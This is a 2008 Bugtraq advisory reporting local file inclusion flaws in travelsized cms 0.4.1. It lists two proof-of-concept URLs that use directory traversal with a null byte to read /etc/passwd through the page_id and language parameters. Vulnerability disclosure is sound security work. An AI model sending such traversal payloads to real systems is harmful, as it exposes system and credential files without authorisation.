
Date: Wed, 12 Mar 2008 00:04:45 +0100
From: "muuratsalo experimental hack lab" <muuratsalo@...il.com>
To: bugtraq@...urityfocus.com
Subject: travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

download   http://sourceforge.net/projects/uberghey/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
http://localhost/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
http://localhost/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00
